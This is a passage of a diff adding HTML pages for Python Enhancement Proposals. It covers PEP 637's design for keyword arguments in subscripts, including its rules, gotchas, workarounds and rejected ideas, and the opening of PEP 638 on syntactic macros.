    +obj[index, spam=1, eggs=2]
    +# calls type(obj).__getitem__(obj, index, spam=1, eggs=2)
    +
    +obj[index, spam=1, eggs=2] = value
    +# calls type(obj).__setitem__(obj, index, value, spam=1, eggs=2)
    +
    +del obj[index, spam=1, eggs=2]
    +# calls type(obj).__delitem__(obj, index, spam=1, eggs=2)
    +
    +# Comma-separated indices with keywords:
    +
    +obj[foo, bar, spam=1, eggs=2]
    +# calls type(obj).__getitem__(obj, (foo, bar), spam=1, eggs=2)
    +
    +obj[foo, bar, spam=1, eggs=2] = value
    +# calls type(obj).__setitem__(obj, (foo, bar), value, spam=1, eggs=2)
    +
    +del obj[foo, bar, spam=1, eggs=2]
    +# calls type(obj).__delitem__(obj, (foo, bar), spam=1, eggs=2)
    +
    +
    +

    Note that:

    +
      +
    • a single positional index will not turn into a tuple +just because one adds a keyword value.
    • +
    • for __setitem__, the same order is retained for index and value. +The keyword arguments go at the end, as is normal for a function +definition.
    • +
    +
  10. +
  11. The same rules apply with respect to keyword subscripts as for +keywords in function calls:
      +
    • the interpreter matches up each keyword subscript to a named parameter +in the appropriate method;
    • +
    • if a named parameter is used twice, that is an error;
    • +
    • if there are any named parameters left over (without a value) when the +keywords are all used, they are assigned their default value (if any);
    • +
    • if any such parameter doesn’t have a default, that is an error;
    • +
    • if there are any keyword subscripts remaining after all the named +parameters are filled, and the method has a **kwargs parameter, +they are bound to the **kwargs parameter as a dict;
    • +
    • but if no **kwargs parameter is defined, it is an error.
    • +
    +
  12. +
  13. Sequence unpacking is allowed inside subscripts:
    obj[*items]
    +
    +
    +

    This allows notations such as [:, *args, :], which could be treated +as [(slice(None), *args, slice(None))]. Multiple star unpackings are +allowed:

    +
    obj[1, *(2, 3), *(4, 5), 6, foo=5]
    +# Equivalent to obj[(1, 2, 3, 4, 5, 6), foo=5]
    +
    +
    +

    The following notation equivalence must be honored:

    +
    obj[*()]
    +# Equivalent to obj[()]
    +
    +obj[*(), foo=3]
    +# Equivalent to obj[(), foo=3]
    +
    +obj[*(x,)]
    +# Equivalent to obj[(x,)]
    +
    +obj[*(x,),]
    +# Equivalent to obj[(x,)]
    +
    +
    +

    Note in particular case 3: sequence unpacking of a single element will +not behave as if only one single argument was passed. A related case is +the following example:

    +
    obj[1, *(), foo=5]
    +# Equivalent to obj[(1,), foo=5]
    +# calls type(obj).__getitem__(obj, (1,), foo=5)
    +
    +
    +

    However, as we saw earlier, for backward compatibility a single index will be passed as is:

    +
    obj[1, foo=5]
    +# calls type(obj).__getitem__(obj, 1, foo=5)
    +
    +
    +

    In other words, a single positional index will be passed “as is” only if no sequence +unpacking is present. If a sequence unpacking is present, then the index will become a tuple, +regardless of the resulting number of elements in the index after the unpacking has taken place.

    +
  14. +
  15. Dict unpacking is permitted:
    items = {'spam': 1, 'eggs': 2}
    +obj[index, **items]
    +# equivalent to obj[index, spam=1, eggs=2]
    +
    +
    +

    The following notation equivalence should be honored:

    +
    obj[**{}]
    +# Equivalent to obj[()]
    +
    +obj[3, **{}]
    +# Equivalent to obj[3]
    +
    +
    +
  16. +
  17. Keyword-only subscripts are permitted. The positional index will be the empty tuple:
    obj[spam=1, eggs=2]
    +# calls type(obj).__getitem__(obj, (), spam=1, eggs=2)
    +
    +obj[spam=1, eggs=2] = 5
    +# calls type(obj).__setitem__(obj, (), 5, spam=1, eggs=2)
    +
    +del obj[spam=1, eggs=2]
    +# calls type(obj).__delitem__(obj, (), spam=1, eggs=2)
    +
    +
    +

    The choice of the empty tuple as a sentinel has been debated. Details are provided in +the Rejected Ideas section.

    +
  18. +
  19. Keyword arguments must allow slice syntax:
    obj[3:4, spam=1:4, eggs=2]
    +# calls type(obj).__getitem__(obj, slice(3, 4, None), spam=slice(1, 4, None), eggs=2)
    +
    +
    +

    This may open up the possibility to accept the same syntax for general function +calls, but this is not part of this recommendation.

    +
  20. +
  21. Keyword arguments allow for default values:
    # Given type(obj).__getitem__(obj, index, spam=True, eggs=2)
    +obj[3]               # Valid. index = 3, spam = True, eggs = 2
    +obj[3, spam=False]   # Valid. index = 3, spam = False, eggs = 2
    +obj[spam=False]      # Valid. index = (), spam = False, eggs = 2
    +obj[]                # Invalid.
    +
    +
    +
  22. +
  23. The same semantics given above must be extended to __class_getitem__: +Since PEP 560, type hints are dispatched so that for x[y], if no +__getitem__ method is found, and x is a type (class) object, +and x has a class method __class_getitem__, that method is +called. The same changes should be applied to this method as well, +so that a notation like list[T=int] can be accepted.
  24. +
+
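
Since the proposed syntax was never accepted, the dispatch can only be illustrated by calling the dunder directly; the Grid class below is hypothetical:

+
class Grid:
+    def __getitem__(self, index, *, direction="north"):
+        return (index, direction)
+
+g = Grid()
+# Under this PEP, g[0, direction="south"] would have compiled down to:
+print(type(g).__getitem__(g, 0, direction="south"))   # (0, 'south')
+
+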
+

Indexing behavior in standard classes (dict, list, etc.)

+

None of what is proposed in this PEP will change the behavior of the current +core classes that use indexing. Adding keywords to the index operation for +custom classes is not the same as modifying e.g. the standard dict type to +handle keyword arguments. In fact, dict (as well as list and other stdlib +classes with indexing semantics) will remain the same and will continue not to +accept keyword arguments. In other words, if d is a dict, the +statement d[1, a=2] will raise TypeError, as their implementation will +not support the use of keyword arguments. The same holds for all other classes +(list, dict, etc.)

+
+
+

Corner case and Gotchas

+

With the introduction of the new notation, a few corner cases need to be analysed.

+
    +
  1. Technically, if a class defines their getter like this:
    def __getitem__(self, index):
    +
    +
    +

    then the caller could call that using keyword syntax, like these two cases:

    +
    obj[3, index=4]
    +obj[index=1]
    +
    +
    +

    The resulting behavior would be an error automatically, since it would be like +attempting to call the method with two values for the index argument, and +a TypeError will be raised. In the first case, the index would be 3, +in the second case, it would be the empty tuple ().

    +

    Note that this behavior applies to all currently existing classes that rely on +indexing, meaning that there is no way for the new behavior to introduce +backward compatibility issues in this respect.

    +

    Classes that wish to stress this behavior explicitly can define their +parameters as positional-only:

    +
    def __getitem__(self, index, /):
    +
    +
    +
  2. +
  3. a similar case occurs with setter notation:
    # Given type(obj).__setitem__(obj, index, value):
    +obj[1, value=3] = 5
    +
    +
    +

    This poses no issue because the value is passed automatically, and the Python interpreter will raise +TypeError: got multiple values for keyword argument 'value'

    +
  4. +
  5. If the subscript dunders are declared to use positional-or-keyword +parameters, there may be some surprising cases when arguments are passed +to the method. Given the signature:
    def __getitem__(self, index, direction='north')
    +
    +
    +

    if the caller uses this:

    +
    obj[0, 'south']
    +
    +
    +

    they will probably be surprised by the method call:

    +
    # expected type(obj).__getitem__(obj, 0, direction='south')
    +# but actually get:
    +type(obj).__getitem__(obj, (0, 'south'), direction='north')
    +
    +
    +

    Solution: best practice suggests that keyword subscripts should be +flagged as keyword-only when possible:

    +
    def __getitem__(self, index, *, direction='north')
    +
    +
    +

    The interpreter need not enforce this rule, as there could be scenarios +where this is the desired behaviour. But linters may choose to warn +about subscript methods which don’t use the keyword-only flag.

    +
  6. +
  7. As we saw, a single value followed by a keyword argument will not be changed into a tuple, i.e.: +d[1, a=3] is treated as __getitem__(d, 1, a=3), NOT __getitem__(d, (1,), a=3). It would be +extremely confusing if adding keyword arguments were to change the type of the passed index. +In other words, adding a keyword to a single-valued subscript will not change it into a tuple. +For those cases where an actual tuple needs to be passed, a proper syntax will have to be used:
    obj[(1,), a=3]
    +# calls type(obj).__getitem__(obj, (1,), a=3)
    +
    +
    +

    In this case, the call is passing a single element (which is passed as is, as from rule above), +only that the single element happens to be a tuple.

    +

    Note that this behavior just reveals the truth that the obj[1,] notation is shorthand for +obj[(1,)] (and also obj[1] is shorthand for obj[(1)], with the expected behavior). +When keywords are present, the rule that you can omit this outermost pair of parentheses is no +longer true:

    +
    obj[1]
    +# calls type(obj).__getitem__(obj, 1)
    +
    +obj[1, a=3]
    +# calls type(obj).__getitem__(obj, 1, a=3)
    +
    +obj[1,]
    +# calls type(obj).__getitem__(obj, (1,))
    +
    +obj[(1,), a=3]
    +# calls type(obj).__getitem__(obj, (1,), a=3)
    +
    +
    +

    This is particularly relevant in the case where two entries are passed:

    +
    obj[1, 2]
    +# calls type(obj).__getitem__(obj, (1, 2))
    +
    +obj[(1, 2)]
    +# same as above
    +
    +obj[1, 2, a=3]
    +# calls type(obj).__getitem__(obj, (1, 2), a=3)
    +
    +obj[(1, 2), a=3]
    +# calls type(obj).__getitem__(obj, (1, 2), a=3)
    +
    +
    +

    And particularly when the tuple is extracted as a variable:

    +
    t = (1, 2)
    +obj[t]
    +# calls type(obj).__getitem__(obj, (1, 2))
    +
    +obj[t, a=3]
    +# calls type(obj).__getitem__(obj, (1, 2), a=3)
    +
    +
    +

    Why? Because in the case obj[1, 2, a=3] we are passing two elements (which +are then packed as a tuple and passed as the index). In the case obj[(1, 2), a=3] +we are passing a single element (which is passed as is) which happens to be a tuple. +The final result is that they are the same.

    +
  8. +
+
+
+
+

C Interface

+

Resolution of the indexing operation is performed through a call to the following functions

+
    +
  • PyObject_GetItem(PyObject *o, PyObject *key) for the get operation
  • +
  • PyObject_SetItem(PyObject *o, PyObject *key, PyObject *value) for the set operation
  • +
  • PyObject_DelItem(PyObject *o, PyObject *key) for the del operation
  • +
+

These functions are used extensively within the Python executable, and are +also part of the public C API, as exported by Include/abstract.h. It is clear that +the signatures of these functions cannot be changed, and different C-level functions +need to be implemented to support the extended call. We propose

+
    +
  • PyObject_GetItemWithKeywords(PyObject *o, PyObject *key, PyObject *kwargs)
  • +
  • PyObject_SetItemWithKeywords(PyObject *o, PyObject *key, PyObject *value, PyObject *kwargs)
  • +
  • PyObject_DelItemWithKeywords(PyObject *o, PyObject *key, PyObject *kwargs)
  • +
+

New opcodes will be needed for the enhanced call. Currently, the +implementation uses BINARY_SUBSCR, STORE_SUBSCR and DELETE_SUBSCR +to invoke the old functions. We propose BINARY_SUBSCR_KW, +STORE_SUBSCR_KW and DELETE_SUBSCR_KW for the new operations. The +compiler will have to generate these new opcodes. The +old C implementations will call the extended methods passing NULL +as kwargs.

+

Finally, the following new slots must be added to the PyMappingMethods struct:

+
    +
  • mp_subscript_kw
  • +
  • mp_ass_subscript_kw
  • +
+

These slots will have the appropriate signature to handle the dictionary object +containing the keywords.

+
+
+

“How to teach” recommendations

+

One request that occurred during feedback sessions was to detail a possible narrative for teaching the feature, e.g. to students, data scientists, and similar audiences. This section addresses that need.

+

We will describe indexing only from the perspective of use, not of implementation, because that is the aspect the above-mentioned audiences are likely to encounter. Only a subset of users will have to implement their own dunder functions, which can be considered advanced usage. A proper explanation could be:

+
+
The indexing operation is generally used to refer to a subset of a larger +dataset by means of an index. In the commonly seen cases, the index is made by +one or more numbers, strings, slices, etc.

Some types may allow indexing to occur not only with the index, but also with +named values. These named values are given between square brackets using the +same syntax used for function call keyword arguments. The meaning of the names +and their use is found in the documentation of the type, as it varies from one +type to another.
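Since the bracket syntax with keywords is the proposed feature itself, it cannot be run on current Python; a teacher could instead emulate the dispatch with an explicit dunder call. The following is a sketch only: the Table class and its column keyword are hypothetical.

class Table:
+    def __init__(self, rows, columns):
+        self.rows, self.columns = rows, columns
+
+    def __getitem__(self, index, *, column):
+        return self.rows[index][self.columns.index(column)]
+
+t = Table(rows=[(10, 0.5), (12, 0.7)], columns=["temperature", "rain"])
+
+# proposed syntax: t[1, column="temperature"]
+# explicit form of the call the interpreter would make:
+assert type(t).__getitem__(t, 1, column="temperature") == 12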

+
+

The teacher will now show some practical real-world examples, explaining the semantics of the feature in the shown library. At the time of writing, these examples do not exist, obviously, but the libraries most likely to implement the feature are pandas and numpy, possibly as a method to refer to columns by name.

+
+
+

Reference Implementation

+

A reference implementation is currently being developed here [6].

+
+
+

Workarounds

+

Every PEP that changes the Python language should “clearly explain why +the existing language specification is inadequate to address the +problem that the PEP solves”.

+

Some rough equivalents to the proposed extension, which we call work-arounds, +are already possible. The work-arounds provide an alternative to enabling the +new syntax, while leaving the semantics to be defined elsewhere.

+

These work-arounds follow. In them the helpers H and P are not intended to +be universal. For example, a module or package might require the use of its own +helpers.

+
    +
  1. User-defined classes can be given getitem and delitem methods that respectively get and delete values stored in a container:
    >>> val = x.getitem(1, 2, a=3, b=4)
    +>>> x.delitem(1, 2, a=3, b=4)
    +
    +
    +

    The same can’t be done for setitem. It’s not valid syntax:

    +
    >>> x.setitem(1, 2, a=3, b=4) = val
    +SyntaxError: can't assign to function call
    +
    +
    +
  2. +
  3. A helper class, here called H, can be used to swap the container +and parameter roles. In other words, we use:
    H(1, 2, a=3, b=4)[x]
    +
    +
    +

    as a substitute for:

    +
    x[1, 2, a=3, b=4]
    +
    +
    +

    This method will work for getitem, delitem and also for setitem (a runnable sketch of such a helper follows this list). This is because:

    +
    >>> H(1, 2, a=3, b=4)[x] = val
    +
    +
    +

    is valid syntax, which can be given the appropriate semantics.

    +
  4. +
  5. A helper function, here called P, can be used to store the +arguments in a single object. For example:
    >>> x[P(1, 2, a=3, b=4)] = val
    +
    +
    +

    is valid syntax, and can be given the appropriate semantics.

    +
  6. +
  7. The lo:hi:step syntax for slices is sometimes very useful. This +syntax is not directly available in the work-arounds. However:
    s[lo:hi:step]
    +
    +
    +

    provides a work-around that is available everywhere, where:

    +
    class S:
    +    def __getitem__(self, key): return key
    +
    +s = S()
    +
    +
    +

    defines the helper object s. For example, s[1:10:2] evaluates to slice(1, 10, 2), which can then be passed to the other work-arounds.

    +
  8. +
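The following is a minimal, runnable sketch of the H helper described above. The toy Store container and its getitem/setitem/delitem method names are stand-ins for whatever a real library would define:

class Store:
+    """Toy container with explicit getitem/setitem/delitem methods."""
+    def __init__(self):
+        self._data = {}
+    def _key(self, args, kwargs):
+        return args, tuple(sorted(kwargs.items()))
+    def getitem(self, *args, **kwargs):
+        return self._data[self._key(args, kwargs)]
+    def setitem(self, *args, value, **kwargs):
+        self._data[self._key(args, kwargs)] = value
+    def delitem(self, *args, **kwargs):
+        del self._data[self._key(args, kwargs)]
+
+class H:
+    """Swap the container and parameter roles: H(1, 2, a=3)[x]."""
+    def __init__(self, *args, **kwargs):
+        self.args, self.kwargs = args, kwargs
+    def __getitem__(self, container):
+        return container.getitem(*self.args, **self.kwargs)
+    def __setitem__(self, container, value):
+        container.setitem(*self.args, value=value, **self.kwargs)
+    def __delitem__(self, container):
+        container.delitem(*self.args, **self.kwargs)
+
+x = Store()
+H(1, 2, a=3, b=4)[x] = "val"   # stands in for x[1, 2, a=3, b=4] = "val"
+assert H(1, 2, a=3, b=4)[x] == "val"
+del H(1, 2, a=3, b=4)[x]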
+
+
+

Rejected Ideas

+
+

Previous PEP 472 solutions

+

PEP 472 presents a number of ideas that are now all to be considered Rejected. A personal email from D’Aprano to the author specifically said:

+
+
I have now carefully read through PEP 472 in full, and I am afraid I +cannot support any of the strategies currently in the PEP.
+

We agree that those options are inferior to the one currently presented, for one reason or another.

+

To keep this document compact, we will not present here the objections to all the options presented in PEP 472. Suffice it to say that they were discussed, and each proposed alternative had one or more dealbreakers.

+
+
+

Adding new dunders

+

It was proposed to introduce new dunders __(get|set|del)item_ex__ that are invoked in preference to the __(get|set|del)item__ triad, if they are present.

+

The rationale behind this choice is to make the way to add keyword argument support to square brackets more intuitive and in line with function behavior. Given:

+
def __getitem_ex__(self, x, y): ...
+
+
+

These all just work and produce the same result effortlessly:

+
obj[1, 2]
+obj[1, y=2]
+obj[y=2, x=1]
+
+
+

In other words, this solution would unify the behavior of __getitem__ to the traditional +function signature, but since we can’t change __getitem__ and break backward compatibility, +we would have an extended version that is used preferentially.

+

The problems with this approach were found to be:

+
    +
  • It will slow down subscripting. For every subscript access, this new dunder attribute gets looked up on the class, and if it is not present then the default key translation function is executed. Different ideas were proposed to handle this, from wrapping the method only at class instantiation time, to adding a bit flag to signal the availability of these methods. Regardless of the solution, the new dunder would be effective only if added at class creation time, not if it’s added later. This would be unusual, and would disallow (or make behave unexpectedly) monkeypatching of the methods, for whatever reason that might be needed.
  • +
  • It adds complexity to the mechanism.
  • +
  • It will require a long and painful transition period, during which libraries will have to somehow support both calling conventions: most likely, the extended methods will delegate to the traditional ones when the right conditions are matched in the arguments, or some classes will support the traditional dunder and others the extended dunder. While this will not affect calling code, it will affect development.
  • +
  • It would potentially lead to mixed situations where the extended version is defined for the getter, but not for the setter.
  • +
  • In the __setitem_ex__ signature, value would have to be made the first +element, because the index is of arbitrary length depending on the specified +indexes. This would look awkward because the visual notation does not match +the signature:
    obj[1, 2] = 3
    +# calls type(obj).__setitem_ex__(obj, 3, 1, 2)
    +
    +
    +
  • +
  • The solution relies on the assumption that all keyword indices necessarily map into positional indices, or that they must have a name. This assumption may be false: xarray, which is the primary Python package for numpy arrays with labelled dimensions, supports indexing by additional dimensions (so called “non-dimension coordinates”) that don’t correspond directly to the dimensions of the underlying numpy array, and those have no position to match up to. In other words, anonymous indexes are a plausible use case that this solution would remove, although it could be argued that using *args would solve that issue.
  • +
+
+
+

Adding an adapter function

+

This is similar to the above, in the sense that a pre-function would be called to convert the “new style” indexing into “old style” indexing, which is then passed on. It has problems similar to the above.

+
+
+

Create a new “kwslice” object

+

This proposal has already been explored in “New arguments contents” P4 in PEP 472:

+
obj[a, b:c, x=1]
+# calls type(obj).__getitem__(obj, a, slice(b, c), key(x=1))
+
+
+

This solution requires everyone who needs keyword arguments to parse the tuple and/or key object by hand to extract them. This is painful, and forces the get/set/del functions to always accept arbitrary keyword arguments, whether they make sense or not. We want the developer to be able to specify which arguments make sense and which ones do not.

+
+
+

Using a single bit to change the behavior

+

A special class dunder flag:

+
__keyfn__ = True
+
+
+

would change the signature of the __get|set|delitem__ triad to a “function-like” dispatch, meaning that this:

+
>>> obj[1, 2, z=3]
+
+
+

would result in a call to:

+
>>> type(obj).__getitem__(obj, 1, 2, z=3)
+# instead of type(obj).__getitem__(obj, (1, 2), z=3)
+
+
+

This option has been rejected because it feels odd that the signature of a method depends on a specific value of another dunder. It would be confusing for both static type checkers and for humans: a static type checker would have to hard-code a special case for this, because there really is nothing else in Python where the signature of a dunder depends on the value of another dunder. A human that has to implement a __getitem__ dunder would have to check the class (and any of its base classes) for a __keyfn__ before the dunder can be written. Moreover, adding a base class that has the __keyfn__ flag set would break the signature of the current methods. This would be even more problematic if the flag were changed at runtime, or if the flag were generated by calling a function that randomly returns True or something else.

+
+
+

Allowing for empty index notation obj[]

+

The current proposal prevents obj[] from being valid notation. However, a commenter stated:

+
+
We have Tuple[int, int] as a tuple of two integers. And we have Tuple[int] +as a tuple of one integer. And occasionally we need to spell a tuple of no +values, since that’s the type of (). But we currently are forced to write +that as Tuple[()]. If we allowed Tuple[] that odd edge case would be +removed.

So I probably would be okay with allowing obj[] syntactically, as long as the +dict type could be made to reject it.

+
+

This proposal already established that, in case no positional index is given, the +passed value must be the empty tuple. Allowing for the empty index notation would +make the dictionary type accept it automatically, to insert or refer to the value with +the empty tuple as key. Moreover, a typing notation such as Tuple[] can easily +be written as Tuple without the indexing notation.

+

However, subsequent discussion with Brandt Bucher during implementation has revealed that the case obj[] would fit a natural evolution for variadic generics, giving more strength to the above comment. In the end, after a discussion between D’Aprano, Bucher and the author, we decided to leave the obj[] notation as a syntax error for now, and possibly extend the notation with an additional PEP that would make obj[] equivalent to obj[()].

+
+
+

Sentinel value for no given positional index

+

The topic of which value to pass as the index in the case of:

+
obj[k=3]
+
+
+

has been considerably debated.

+

One apparently rational choice would be to pass no value at all, by making use of the keyword-only argument feature, but unfortunately this will not work well with the __setitem__ dunder, as a positional element for the value is always passed, and we can’t “skip over” the index unless we introduce a very weird behavior where the first argument refers to the index when specified, and to the value when the index is not specified. This is extremely deceiving and error-prone.

+

The above consideration makes it impossible to have a keyword-only dunder, and opens up the question of what entity to pass for the index position when no index is passed:

+
obj[k=3] = 5
+# would call type(obj).__setitem__(obj, ???, 5, k=3)
+
+
+

A proposed hack would be to let the user specify which entity to use when an index is not specified, by specifying a default for the index, but this necessarily forces also specifying a (never going to be used, as a value is always passed by design) default for the value, as we can’t have non-default arguments after defaulted ones:

+
def __setitem__(self, index=SENTINEL, value=NEVERUSED, *, k)
+
+
+

which seems ugly, redundant and confusing. We must therefore accept that some +form of sentinel index must be passed by the Python implementation when the +obj[k=3] notation is used. This also means that default arguments to those +parameters are simply never going to be used (but it’s already the +case with the current implementation, so no change there).

+

Additionally, some classes may want to use **kwargs, instead of a keyword-only +argument, meaning that having a definition like:

+
def __setitem__(self, index, value, **kwargs):
+
+
+

and a user that wants to pass a keyword value:

+
x[value=1] = 0
+
+
+

expecting a call like:

+
type(obj).__setitem__(obj, SENTINEL, 0, **{"value": 1})
+
+
+

will instead accidentally be caught by the named value parameter, producing a “multiple values” error. The user should not be worried about the actual local names of those two arguments if they are, for all practical purposes, positional-only. Unfortunately, while using positional-only parameters will ensure this does not happen, it still does not remove the need to pass both index and value even when the index is not provided. The point is that the user should not be prevented from using keyword arguments to refer to a column named index, value (or self) just because the class implementor happens to use those names in the parameter list.
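This clash is easy to demonstrate with a plain function standing in for __setitem__; the names below are illustrative only:

def setitem(index, value, **kwargs):
+    print(index, value, kwargs)
+
+SENTINEL = ()
+try:
+    # the user meant the keyword subscript {"value": 1}, but it
+    # collides with the parameter that happens to be named "value":
+    setitem(SENTINEL, 0, **{"value": 1})
+except TypeError as err:
+    print(err)  # setitem() got multiple values for argument 'value'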

+

Moreover, we also require the three dunders to behave in the same way: it would be extremely inconvenient if only __setitem__ were to receive this sentinel, while __get|delitem__ did not because they can get away with a signature that allows for no index specification, thus allowing for a user-specified default index.

+

Whatever the choice of the sentinel, it will make the following cases +degenerate and thus impossible to differentiate in the dunder:

+
obj[k=3]
+obj[SENTINEL, k=3]
+
+
+

The question now shifts to which entity should represent the sentinel: +the options were:

+
    +
  1. Empty tuple
  2. +
  3. None
  4. +
  5. NotImplemented
  6. +
  7. a new sentinel object (e.g. NoIndex)
  8. +
+

For option 1, the call will become:

+
type(obj).__getitem__(obj, (), k=3)
+
+
+

therefore making obj[k=3] and obj[(), k=3] degenerate and indistinguishable.

+

This option sounds appealing because:

+
    +
  1. The numpy community was consulted [5], and the general consensus of the responses was that the empty tuple felt appropriate.
  2. +
  3. It shows a parallel with the behavior of *args in a function, when +no positional arguments are given:
    >>> def foo(*args, **kwargs):
    +...     print(args, kwargs)
    +...
    +>>> foo(k=3)
    +() {'k': 3}
    +
    +
    +

    We do accept the following asymmetry in behavior compared to functions when a single value is passed, but that ship has sailed:

    +
    >>> foo(5, k=3)
    +(5,) {'k': 3}   # for indexing, a plain 5, not a 1-tuple is passed
    +
    +
    +
  4. +
+

For option 2, using None, it was objected that NumPy uses it to indicate inserting a new axis/dimension (there’s a np.newaxis alias as well):

+
arr = np.array(5)
+arr.ndim == 0
+arr[None].ndim == arr[None,].ndim == 1
+
+
+

While this is not an insurmountable issue, it would certainly ripple onto numpy.

+

The only issue with both of the above is that the empty tuple and None are both potentially legitimate indexes, and there might be value in being able to differentiate the two degenerate cases.

+

So, an alternative strategy (option 3) would be to use an existing entity that is unlikely to be used as a valid index. One option could be the current built-in constant NotImplemented, which is currently returned by operator methods to report that they do not implement a particular operation, and that a different strategy should be attempted (e.g. to ask the other object). Unfortunately, its name and traditional use call back to a feature that is not available, rather than to the fact that something was not passed by the user.

+

This leaves us with option 4: a new built-in constant. This constant must be unhashable (so it’s never going to be a valid key) and have a clear name that makes its context obvious: NoIndex. This would solve all the above issues, but the question is: is it worth it?

+

From a quick inquiry, it seems that most people on python-ideas believe it’s not crucial, and the empty tuple is an acceptable option. Hence the resulting series will be:

+
obj[k=3]
+# type(obj).__getitem__(obj, (), k=3). Empty tuple
+
+obj[1, k=3]
+# type(obj).__getitem__(obj, 1, k=3). Integer
+
+obj[1, 2, k=3]
+# type(obj).__getitem__(obj, (1, 2), k=3). Tuple
+
+
+

and the following two notations will be degenerate:

+
obj[(), k=3]
+# type(obj).__getitem__(obj, (), k=3)
+
+obj[k=3]
+# type(obj).__getitem__(obj, (), k=3)
+
+
+
+
+
+

Common objections

+
    +
  1. Just use a method call.

    One of the use cases is typing, where indexing is used exclusively and function calls are out of the question. Moreover, function calls do not handle slice notation, which is commonly used in some cases for arrays.

    +

    Note also that type hint creation has been extended to built-ins in Python 3.9, so that you do not have to import Dict, List, et al. anymore.

    +

    Without kwdargs inside [], you would not be able to do this:

    +
    Vector = dict[i=float, j=float]
    +
    +
    +

    but for obvious reasons, call syntax using builtins to create custom type hints +isn’t an option:

    +
    dict(i=float, j=float)
    +# would create a dictionary, not a type
    +
    +
    +

    Finally, function calls do not allow for a setitem-like notation, as shown in the Overview: operations such as f(1, x=3) = 5 are not allowed, whereas they are for indexing operations.

    +
  2. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0637.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0638/index.html b/pep-0638/index.html new file mode 100644 index 00000000000..b444cc1d221 --- /dev/null +++ b/pep-0638/index.html @@ -0,0 +1,687 @@ + + + + + + + + PEP 638 – Syntactic Macros | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 638 – Syntactic Macros

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Discussions-To:
+
Python-Dev thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
24-Sep-2020
+
Post-History:
+
26-Sep-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds support for syntactic macros to Python. +A macro is a compile-time function that transforms +a part of the program to allow functionality that cannot be +expressed cleanly in normal library code.

+

The term “syntactic” means that this sort of macro operates on the program’s +syntax tree. This reduces the chance of mistranslation that can happen +with text-based substitution macros, and allows the implementation +of hygienic macros.

+

Syntactic macros allow libraries to modify the abstract syntax tree during compilation, providing the ability to extend the language for specific domains without adding complexity to the language as a whole.

+
+
+

Motivation

+

New language features can be controversial, disruptive and sometimes divisive. Python is now sufficiently powerful and complex that many proposed additions are a net loss for the language due to the additional complexity.

+

Although a language change may make certain patterns easy to express, +it will have a cost. Each new feature makes the language larger, +harder to learn and harder to understand. +Python was once described as Python Fits Your Brain, +but that becomes less and less true as more and more features are added.

+

Because of the high cost of adding a new feature, +it is very difficult or impossible to add a feature that would benefit only +some users, regardless of how many users, or how beneficial that feature would +be to them.

+

The use of Python in data science and machine learning has grown very rapidly +over the last few years. +However, most of the core developers of Python do not have a background in +data science or machine learning. +This makes it extremely difficult for the core developers to determine whether a +language extension for machine learning is worthwhile.

+

By allowing language extensions to be modular and distributable, like libraries, +domain-specific extensions can be implemented without negatively impacting +users outside of that domain. +A web developer is likely to want a very different set of extensions from +a data scientist. +We need to let the community develop their own extensions.

+

Without some form of user-defined language extensions, +there will be a constant battle between those wanting to keep the +language compact and fitting their brains, and those wanting a new feature +that suits their domain or programming style.

+
+

Improving the expressiveness of libraries for specific domains

+

Many domains see repeated patterns that are difficult or impossible +to express as a library. +Macros can express those patterns in a more concise and less error-prone way.

+
+
+

Trialing new language features

+

It is possible to demonstrate potential language extensions using macros. For example, macros would have enabled the with statement and yield from expression to have been trialed. Doing so might well have led to a higher quality implementation at first release, by allowing more testing before those features were included in the language.

+

It is nearly impossible to make sure that a new feature is completely reliable +before it is released; bugs relating to the with and yield from +features were still being fixed many years after they were released.

+
+
+

Long term stability for the bytecode interpreter

+

Historically, new language features have been implemented by naive compilation +of the AST into new, complex bytecode instructions. +Those bytecodes have often had their own internal flow-control, performing +operations that could, and should, have been done in the compiler.

+

For example, +until recently flow control within the try-finally and with +statements was managed by complicated bytecodes with context-dependent semantics. +The control flow within those statements is now implemented in the compiler, making +the interpreter simpler and faster.

+

By implementing new features as AST transformations, the existing compiler can +generate the bytecode for a feature without having to modify the interpreter.

+

A stable interpreter is necessary if we are to improve the performance and +portability of the CPython VM.

+
+
+
+

Rationale

+

Python is both expressive and easy to learn; it is widely recognized as the easiest to learn of the widely used programming languages. However, it is not the most flexible. That title belongs to lisp.

+

Because lisp is homoiconic, meaning that lisp programs are lisp data structures, +lisp programs can be manipulated by lisp programs. +Thus much of the language can be defined in itself.

+

We would like that ability in Python, without the many parentheses that characterize lisp. Fortunately, homoiconicity is not needed for a language to be able to manipulate itself; all that is needed is the ability to manipulate programs after parsing, but before translation to an executable form.

+

Python already has the components needed. The syntax tree of Python is available through the ast module. All that is needed is a marker to tell the compiler that a macro is present, and the ability for the compiler to call back into user code to manipulate the AST.

+
+
+

Specification

+
+

Syntax

+
+

Lexical analysis

+

Any sequence of identifier characters followed by an exclamation point +(exclamation mark, UK English) will be tokenized as a MACRO_NAME.

+
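As a rough sketch of the rule (the real implementation would live in the tokenizer, and full Unicode identifier rules would apply, so the ASCII-only regular expression below is only an approximation):

import re
+
+MACRO_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*!")
+
+assert MACRO_NAME.fullmatch("switch!")
+assert MACRO_NAME.fullmatch("import!")
+assert not MACRO_NAME.fullmatch("switch")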
+
+

Statement form

+
macro_stmt = MACRO_NAME testlist [ "import" NAME ] [ "as"  NAME ] [ ":" NEWLINE suite ]
+
+
+
+
+

Expression form

+
macro_expr = MACRO_NAME "(" testlist ")"
+
+
+
+
+

Resolving ambiguity

+

The statement form of a macro takes precedence, so that the code +macro_name!(x) will be parsed as a macro statement, +not as an expression statement containing a macro expression.

+
+
+
+

Semantics

+
+

Compilation

+

Upon encountering a macro during translation to bytecode, +the code generator will look up the macro processor registered for the macro, +and pass the AST rooted at the macro to the processor function. +The returned AST will then be substituted for the original tree.

+
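The substitution step can be emulated at runtime with today’s ast module, which may help visualize what the code generator would do at compile time; the double_ rewrite below is purely illustrative:

import ast
+
+class DoubleMacro(ast.NodeTransformer):
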